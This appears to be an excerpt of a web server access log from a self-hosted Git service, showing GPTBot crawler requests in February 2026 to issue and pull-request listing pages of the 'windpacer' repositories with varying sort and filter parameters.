"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 